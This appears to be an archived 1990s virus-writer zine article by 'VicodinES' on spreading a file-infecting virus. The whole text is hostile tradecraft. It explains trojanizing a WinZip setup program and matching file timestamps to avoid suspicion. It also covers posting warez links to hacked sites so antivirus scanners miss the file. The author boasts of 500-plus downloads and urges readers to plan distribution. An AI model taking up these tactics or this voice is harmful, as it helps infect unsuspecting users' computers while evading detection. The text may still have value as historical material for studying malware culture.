Ok, do you subscribe to my theory of Better Distribution yet? No? I'll try once again with a more complex virus and a totally different angle, but sticking to the main points of my theory : DEMAND, DECEPTION and INFECTION!
EXAMPLE #2:
The Virus: *.exe (Windows EXE) non-memory resident file infector.
(virus.exe)
Tools Needed: A current or new beta release of a popular Windows program.
Ok let's start! Mission number one? DEMAND! For this example let's use the latest greatest release of WinZip (beta or otherwise). That should take care of demand - everyone wants a new FREE version of WinZip. It's a good universal program to use just like pkzip was a few years ago.
As you just saw demand takes care of itself if you just put a little thought into it. Lets see if DECEPTION will do the same thing. How do you infect WinZip? Well, since this a more advanced example I will just assume that I don't have to show you how to infect a file. But, I will tell you to test your work! Think! The WinZip setup program is a lot more complex than any dropper .bat file we can construct so be sure to test your infection. For example I have done the WinZip thing and the Setup.exe for the 16bit WinZip has to have the exact same time/date stamp as the readme.txt. You may have made a successful infection but your deception will fail if the infected program screams that time/date stamps don't match! So with the more complex programs deception takes a bit more thought. Does the deception end here? No. How will you distribute this virus in a deceptive way? If you follow the normal route of distribution for a new virus that is attached to a new ware then you would just post the zip to alt.binaries.warez and all other warez-related newsgroups. Well, that's great but Dr Solly scans most binary newsgroups and posts virus alerts and instant fixes. So in one day you can be found, named and have a remover. That is the worst thing that could ever happen to a new virus! So what's there to do? Well either scam some warez web sites or warez traders into taking your file if it's legit (but infected) or do what I do/did and post to all those USENET warez related newsgroups with a LINK to some hacked out ftp or web site where the file is stored!! No one bothers to follow all warez links and scan them. Shit, I did this for one of my files and hid a counter on the site . it reached 553 before Geocities threw me off for distributing registered software. Now think about that - I took a new, not named and currently unscannable virus and had 500+ people seek it out (and run it?). For deceptive distribution that was a slam-dunk!
Ok now how did my INFECTION take care of itself? I chose a setup.exe!!! You have to choose your carriers wisely. A setup program usually runs all over and infects the program that it is setting up, in this case WinZip. Plus, WinZip is an often used program which greatly increases your chances of survival and any self extracting archives will be carriers or my virus!
Are you now convinced that my "Theory of Better Distribution" is the way to attack your next world wide virus infection? I hope so.
Boot sector virii don't have to rule the world of distribution (and the Wild List!) - think hard and you will figure out new and ingenious ways to make someone want your virus. I hope that I have made you think a bit harder about what you're going to do the next time that you decide to distribute one of your virii. Hopefully you will never again just upload some "new patch" for some obscure program to a local BBS and pray that your virus makes it around the world. If this was 1989 then you may have had a chance but remember that you have to think about now. Also, don't think you can just upload sex.exe to alt.binaries.erotica. Few people are stupid enough for run an .exe from a porn newsgroups (though I believe some are - just not enough of them to count).
Once again remember you have to think about now, don't take into account how they used to do it! Think about how you can do it now! How do you get files now? What programs do you want now? What makes you suspicious now?
Remember unless you still want to live that "I just write virii for research" lie then you need to think as hard about your distribution as you did on making your multipartite encrypted armored polymorphic stealth tunneling memory resident Windows 95 virus!!!
Peace,
VicodinES
Ps. I also recommend you get the Nowhere Utilities by Nowhere Man! Fucing
great tools for deception!
[text content edited by Commander Ritalin and Fastin.Blee]
CERT Advisory 99-04, Melissa Macro Virus http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html (Appendix 1)
VDAT Cicatrix interview of VicodinES (Appendix 2)
Last Modified: 12/09/99 12:50